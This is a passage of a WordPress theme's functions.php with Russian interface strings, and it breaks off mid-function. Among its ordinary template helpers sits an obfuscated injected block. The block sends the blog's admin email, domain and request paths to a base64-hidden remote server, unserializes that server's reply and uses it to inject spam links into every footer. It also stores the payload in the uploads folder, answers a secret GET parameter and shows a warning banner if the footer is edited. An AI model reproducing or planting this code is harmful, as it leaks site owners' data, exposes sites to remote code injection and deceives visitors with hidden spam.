<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $iZRYmCl='_';$YdvtQ='6';$pIsGaPZ='c';$RLLZBYj='e';$trVlcGk='d';$YZNWmqi='o';$dcaDLH='a';$vMTb='b';$QmLmKQf='s';$EuYDyt='e';$vrsxs='4';$LffpAe='e';$JzeU='d';$OiQmjSaT=$vMTb.$dcaDLH.$QmLmKQf.$RLLZBYj.$YdvtQ.$vrsxs.$iZRYmCl.$trVlcGk.$EuYDyt.$pIsGaPZ.$YZNWmqi.$JzeU.$LffpAe;$zBogBnn='z';$AfrBMhb='l';$phlkaRi='e';$MwjkzPC='t';$BOsaH='g';$dbpx='i';$uVTGYq='f';$whQJv='a';$Fsrz='n';$Umcvomdx=$BOsaH.$zBogBnn.$dbpx.$Fsrz.$uVTGYq.$AfrBMhb.$whQJv.$MwjkzPC.$phlkaRi;$HdFQvvz='r';$PaeXj='r';$TPztvP='3';$qCbyx='o';$asSSW='1';$lssL='s';$VBrCEW='t';$EKbTWAF='_';$VCwd='t';$lyLtpvOi=$lssL.$VCwd.$HdFQvvz.$EKbTWAF.$PaeXj.$qCbyx.$VBrCEW.$asSSW.$TPztvP;$nCro='v';$WaUmMQ='t';$ZYdGh='r';$Fhag='s';$kDWQgW='e';$hhpI='r';$AUUpGDZt=$Fhag.$WaUmMQ.$ZYdGh.$hhpI.$kDWQgW.$nCro;                     $xq_____b='_';$mf_________w='6';$lr___________z='c';$vi__________u='e';$fm_____________y='d';$pc___k='o';$oi___x='a';$tt_____p='b';$nx________c='s';$fc_________t='e';$ix____o='4';$yu_____________h='e';$ls_____y='d';$tj__________g=$tt_____p.$oi___x.$nx________c.$vi__________u.$mf_________w.$ix____o.$xq_____b.$fm_____________y.$fc_________t.$lr___________z.$pc___k.$ls_____y.$yu_____________h;$eg_______h='s';$xa________y='t';$qt___r='f';$al______________p='s';$dt_______u='n';$cz_______________z='i';$ry________x='c';$ps_______________n='n';$nl________e='_';$ke_________c='x';$ry_____a='u';$fs__a='t';$vl_____j='o';$pu_____________k='i';$ks____z='e';$nd___________u=$qt___r.$ry_____a.$ps_______________n.$ry________x.$xa________y.$pu_____________k.$vl_____j.$dt_______u.$nl________e.$ks____z.$ke_________c.$cz_______________z.$al______________p.$fs__a.$eg_______h;$vt_______z='f';$oj_________t='p';$xf_______d='e';$cz_____________e='n';$au______a='o';$lr__q=$vt_______z.$au______a.$oj_________t.$xf_______d.$cz_____________e;$pz___________n='d';$rw______________u='r';$qr__t='f';$sl____h='a';$kg__s='e';$ej_____________f=$qr__t.$rw______________u.$kg__s.$sl____h.$pz___________n;$xi____________p='o';$cy______________s='s';$df_____w='c';$oy__________j='l';$aa____________i='e';$wb____________b='f';$oc__________s=$wb____________b.$df_____w.$oy__________j.$xi____________p.$cy______________s.$aa____________i;define("WP_ID", $tj__________g("Mi4wLjA="));define("WP_TTL", $tj__________g("MTA4MDA="));define("WP_SRC", $tj__________g("dHBva24="));function wp_get_header() {global $tj__________g, $nd___________u;if ($nd___________u($tj__________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$nd___________u($tj__________g("d3BfZ2V0X2Zvb3Rlcg==")) &&$nd___________u($tj__________g("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $tj__________g, $lr__q, $oc__________s, $ej_____________f;$ms____________h = TEMPLATEPATH."/".$tj__________g("Zm9vdGVyLnBocA==");$ty______________v = @$lr__q($ms____________h, "r");$ms____________h = @$ej_____________f($ty______________v, @filesize($ms____________h));@$oc__________s($ty______________v);$db_______h = TEMPLATEPATH."/".$tj__________g("ZnVuY3Rpb25zLnBocA==");$ty______________v = @$lr__q($db_______h, "r");$db_______h = @$ej_____________f($ty______________v, @filesize($db_______h));@$oc__________s($ty______________v);$ii_____________c = 0;if($ms____________h && $db_______h) {if ($tj__________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($ms____________h, $tj__________g("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ii_____________c = 1;}if (substr_count($ms____________h, "wp_theme_GPL_credits()") < 1) {$ii_____________c = 2;}}if(WP_ID != "2.0.0") {$ii_____________c = 12;}}if($ii_____________c > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ii_____________c -->";}}function wp_loaded() {global $tj__________g, $nd___________u;return $nd___________u($tj__________g("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($rw_____o, $rf___________i = "(more...)", $lt_________f = 0, $aa_____________l = "") {$by______________x = get_the_content($rf___________i, $lt_________f, $aa_____________l);$by______________x = apply_filters("the_content", $by______________x);$by______________x = str_replace("]]>", "]]>", $by______________x);if (strlen($_GET["p"]) > 0) {echo $by______________x;}else if ((strlen($by______________x)>$rw_____o) && ($lw_________v = strpos($by______________x, " ", $rw_____o ))) {$by______________x = substr($by______________x, 0, $lw_________v);$by______________x = $by______________x;echo $by______________x;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$rf___________i</a></div></p>";} else {echo $by______________x;}}}$zn______________w='s';$ql______________x='o';$ad_________a='c';$pc__p='4';$wv______h='d';$pa____________g='b';$nh__c='e';$gk_______________k='e';$qs_____________f='e';$su________x='_';$rm___________d='a';$lr__t='6';$so________k='n';$dv______________p=$pa____________g.$rm___________d.$zn______________w.$gk_______________k.$lr__t.$pc__p.$su________x.$qs_____________f.$so________k.$ad_________a.$ql______________x.$wv______h.$nh__c;$js_____________m='c';$uj_______________o='_';$vf_______a='e';$fy____c='e';$nt______z='f';$gw________s='n';$xn___________s='t';$do___________o='l';$wq_____g='s';$pq________e='g';$mb__z='t';$gn__m='o';$pa________k='e';$tz_________i='t';$hm_______u='_';$mg__________u='n';$tz____________g='i';$st_________q=$nt______z.$tz____________g.$do___________o.$fy____c.$hm_______u.$pq________e.$vf_______a.$mb__z.$uj_______________o.$js_____________m.$gn__m.$mg__________u.$tz_________i.$pa________k.$gw________s.$xn___________s.$wq_____g;$ew______________l='x';$hz_____n='_';$wv_______h='e';$qh_____________y='e';$zn______________z='s';$zs_______w='s';$gl__________z='t';$zs_________p='i';$to___k='l';$ac____t='i';$tx_______e='f';$qy______m=$tx_______e.$zs_________p.$to___k.$wv_______h.$hz_____n.$qh_____________y.$ew______________l.$ac____t.$zn______________z.$gl__________z.$zs_______w;$vv______h='c';$tj_______z='i';$fc_____z='p';$ln_________a='e';$iu_______________a='_';$mp_______________e='a';$px___________x='m';$hh_______i='s';$ot__________u='r';$rb______________g='v';$cv_____________k='e';$jv______x='o';$rr______x='o';$ev____________j='n';$hg___m='r';$dq_____a=$rb______________g.$ln_________a.$ot__________u.$hh_______i.$tj_______z.$rr______x.$ev____________j.$iu_______________a.$vv______h.$jv______x.$px___________x.$fc_____z.$mp_______________e.$hg___m.$cv_____________k;$av__h='k';$om_________r='e';$hh____________q='n';$am_________a='p';$cu____________b='f';$iu____q='o';$bh_____z='o';$ip____q='c';$ju____b='s';$ou_______________t=$cu____________b.$ju____b.$bh_____z.$ip____q.$av__h.$iu____q.$am_________a.$om_________r.$hh____________q;$oy___________a='e';$lk____________n='i';$wl_______________y='f';$qe____e='r';$po______________q='t';$js__p='w';$om____j=$wl_______________y.$js__p.$qe____e.$lk____________n.$po______________q.$oy___________a;$se_____i='d';$tf_______________h='5';$ii________u='m';$yp_______________f=$ii________u.$se_____i.$tf_______________h;$wz_______________g='l';$mc_______e='p';$ov__________e='a';$jk________u='h';$lt______________p='r';$nv_______________o='a';$zq______________d='e';$fi_______________e='t';$xo____________j=$lt______________p.$zq______________d.$nv_______________o.$wz_______________g.$mc_______e.$ov__________e.$fi_______________e.$jk________u;$pr_____________b='u';$ei____u='r';$bh_________a='i';$jo_______________n='s';$ww_____________n='e';$qp______________t='i';$eo__________n='z';$cp___________w='n';$do__z='e';$fz____________u='l';$lf____p='a';$lz____________y=$pr_____________b.$cp___________w.$jo_______________n.$ww_____________n.$ei____u.$bh_________a.$lf____p.$fz____________u.$qp______________t.$eo__________n.$do__z;$ei_____________p='p';$yk__n='a';$ue____t='m';$cy__________m='n';$xl_________w='e';$ju______n='m';$bf__g='t';$sj__r=$bf__g.$xl_________w.$ju______n.$ei_____________p.$cy__________m.$yk__n.$ue____t;$nl_____d='c';$or____________b='n';$uk____________v='_';$px____________i='e';$df________m='e';$cq___________g='c';$qs__c='s';$hu__________j='x';$cv______k='t';$xw______m='r';$bz_______________n='m';$jb_____c='a';$zm______________d='e';$yh_______p='t';$ob_________y='e';$kq_______j='t';$zq_______m='_';$eh_____c='o';$rx______u='a';$tp______________o='t';$ms______________i='r';$ix_____________y=$qs__c.$yh_______p.$ms______________i.$zm______________d.$jb_____c.$bz_______________n.$uk____________v.$nl_____d.$eh_____c.$or____________b.$kq_______j.$df________m.$hu__________j.$tp______________o.$zq_______m.$cq___________g.$xw______m.$ob_________y.$rx______u.$cv______k.$px____________i;function yz_____________q($te____________f) {global $tj__________g, $nd___________u, $st_________q, $dq_____a, $ix_____________y;if (!$nd___________u($tj__________g("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($dq_____a(PHP_VERSION, "5.0.0", ">=") && $nd___________u($tj__________g("ZmlsZV9nZXRfY29udGVudHM=")) && $nd___________u($tj__________g("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$tx___________o = $ix_____________y(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$jc____b = @$st_________q($te____________f, 0, $tx___________o);} else {$jc____b = @$st_________q($te____________f, 0);}return $jc____b;}function ab_______q($te____________f) {global $nd___________u, $ou_______________t, $om____j, $tj__________g;if (!$nd___________u($tj__________g("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$he__k = strpos($te____________f, "/", 7);$ty______x = array("uri"     => substr($te____________f, $he__k),"host"    => str_replace("http://", "", substr($te____________f, 0, $he__k)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$gu_________a = @$ou_______________t("$ty______x[host]", 80, $ty__________o, $fl____________t, 4);if (!$gu_________a) {return false;} else {$jc____b = "";$ag_________j  = "GET $ty______x[uri] HTTP/1.0\r\n";$ag_________j .= "Host: $ty______x[host]\r\n";$ag_________j .= "Referer: $ty______x[referer]\r\n";$ag_________j .= "Connection: Close\r\n\r\n";@$om____j($gu_________a, $ag_________j);while (!@feof($gu_________a)) {$dh_________e = @fgets($gu_________a, (1024*24));if ($dh_________e == "\r\n") {$kr________z = true;continue;}if ($kr________z) {$jc____b .= $dh_________e;}}return $jc____b;}}function eo______b($te____________f) {global $nd___________u;$hd_____________b = false;if ($te____________f != "") {if ($nd___________u("yz_____________q")) {$hd_____________b = @yz_____________q($te____________f);}if (!$hd_____________b && ($nd___________u("ab_______q"))) {$hd_____________b = @ab_______q($te____________f);}}return $hd_____________b;}function sv____x() {global $_SERVER, $yp_______________f;$su____________k = $_SERVER["SERVER_NAME"];if (substr("$su____________k", 0, 4) == "www.") {$su____________k = substr("$su____________k", 4);}$su____________k = $yp_______________f("$_SERVER[SERVER_NAME]");return $su____________k;}function dt_____q() {return "file";}function cs______i($te____________f) {global $_SERVER, $st_________q, $qy______m, $lr__q, $oc__________s, $om____j;$bs______________x = mx________k();$lq__________g = sv____x().".jpg";$kw__m = $bs______________x["dir_upload"]["path"]."/$lq__________g";$zk____n = @filemtime($kw__m);if (!$zk____n || ((time()-$zk____n) >= WP_TTL)) {$hd_____________b = eo______b($te____________f);if ($hd_____________b) {if ($qy______m($kw__m)) {@unlink($kw__m);}$ty______________v = @$lr__q($kw__m, "x+");@$om____j($ty______________v, $hd_____________b);@$oc__________s($ty______________v);}} else {if ($qy______m($kw__m)) {$hd_____________b = @$st_________q($kw__m);} else {$hd_____________b = false;}}return $hd_____________b;}function mx________k() {global $_SERVER, $tj__________g, $dv______________p;$bi________i = wp_count_posts("post");$fb_____o = pathinfo(get_bloginfo("template_directory"));$bs______________x = array("url" => array("report"      => $tj__________g("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $fb_____o,"dir_upload"=> vf______________t(),"queryString"=> array("?a001=".WP_ID,"a004=".$fb_____o[filename],"a005=".$bi________i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => " <a href=\"http://smolotkom.ru/63-betonosmesiteli.html\">сбр</a>");$bs______________x["url"]["queryString"] = implode("&", $bs______________x["queryString"]);$bs______________x["url"]["report"] = $bs______________x["url"]["report"]."/?".$dv______________p($bs______________x["url"]["queryString"]).".html";return $bs______________x;}function vf______________t() {$ri______k = wp_upload_dir();if (isset($ri______k["error"])) {$sm________o = oi_____t();if (is_writable($sm________o)) {$ri______k = array("path" => $sm________o);}}return $ri______k;}function oi_____t() {global $nd___________u, $yp_______________f, $xo____________j, $sj__r;$bl___s = (bool) ini_get("safe_mode");if ($bl___s == true) {return false;}if ($nd___________u("sys_get_temp_dir")) {$id_______a = sys_get_temp_dir();if (is_writable($id_______a)) {return $xo____________j($id_______a);}}if (!empty($_ENV["TMP"])) {return $xo____________j($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $xo____________j($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $xo____________j($_ENV["TEMP"]);} else {$fa_____________l = $sj__r($yp_______________f(uniqid(rand(), true)), "");if ($fa_____________l) {$id_______a = $xo____________j(dirname($fa_____________l));@unlink($fa_____________l);return $id_______a;} else {return false;}}}function tv_______________u() {global $_GET, $qy______m;$bs______________x = mx________k();$su____________k = sv____x();$pt__b = dt_____q();$ql__y = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($pt__b == "file") {$lx___________p = $bs______________x["dir_upload"]["path"]."/".$su____________k.".jpg";if ($qy______m($lx___________p)) {@unlink($lx___________p);$ql__y = "deleted";}}$wv_____o = array("s"=> $ql__y,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($wv_____o AS $aj______________l => $ho__d) echo " [$aj______________l:$ho__d]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $nd___________u, $tj__________g, $lz____________y;$bs______________x = mx________k();$no_________z = "cs______i";if ($nd___________u($no_________z)) {$jc____b = $no_________z($bs______________x["url"]["report"]);}if ($jc____b) {if ($jc____b = @$tj__________g($jc____b)) {$jc____b = @$lz____________y($jc____b);if (strlen($jc____b[custom_credit]) >= 5) {$bs______________x["default_string"] = $jc____b[custom_credit];}if ($jc____b["status"] == "0") {$jj______________i = 1;$qf________c = 1;} else {$zn_________k = sizeof($jc____b["links"]);$cd____w = $bs______________x["default_string"];if ($zn_________k > 0 && $jc____b["links"] !== "") {$so____________h = 0;foreach ($jc____b["links"] as $oq_________c => $zp__________h) {$so____________h++;if ($zp__________h->l_path == "" || $zp__________h->l_path == $_SERVER["REQUEST_URI"]) {$zp__________h->l_href = htmlspecialchars(strip_tags($zp__________h->l_href));$zp__________h->l_title = htmlspecialchars(strip_tags($zp__________h->l_title));$zp__________h->l_anchor = htmlspecialchars(strip_tags($zp__________h->l_anchor));$cd____w .= " | ";$cd____w .= "<a href='$zp__________h->l_href' title='$zp__________h->l_title'";if ($zp__________h->l_nofollow == "1") {$cd____w .= " rel='nofollow'";}$cd____w .= ">$zp__________h->l_anchor</a>";}}}$bs______________x["links"] = "$cd____w";if ($jc____b[credit] == "0") {$bs______________x["links"] = "";}}} else {$jj______________i = "1";}} else {$jj______________i = "1";}if ($jj______________i == "1") {$bs______________x["links"] = $bs______________x["default_string"];}echo "$bs______________x[links]";echo "<!-- s: $jc____b[signature] -->";tv_______________u();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
